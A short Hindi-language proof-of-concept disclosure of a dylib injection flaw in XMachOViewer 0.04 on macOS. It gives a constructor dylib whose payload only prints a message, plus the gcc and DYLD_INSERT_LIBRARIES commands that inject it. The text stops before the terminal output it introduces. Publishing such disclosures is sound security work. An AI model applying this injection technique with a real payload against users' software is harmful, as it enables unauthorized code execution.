
XMachOViewer 0.04 में dylib इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो macOS पर DYLD_INSERT_LIBRARIES के माध्यम से अनधिकृत कोड निष्पादन प्रदर्शित करता है।
XMachOViewer 0.04 में एक dylib इंजेक्शन भेद्यता हमलावरों को अखंडता से समझौता करने की अनुमति देती है। इसका शोषण करके, उत्पाद की प्रक्रियाओं में अनधिकृत कोड इंजेक्ट किया जा सकता है, जो संभावित रूप से दूरस्थ नियंत्रण और संवेदनशील उपयोगकर्ता डेटा तक अनधिकृत पहुंच की ओर ले जाता है।

macOS के लिए पोर्टेबल संस्करण
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
कंपाइल करें
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
और इसे इंजेक्ट करें:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
यह एप्लिकेशन को खोलेगा और dylib को चलाएगा। एप्लिकेशन को बंद करने के बाद, हम इसे टर्मिनल में देखते हैं:
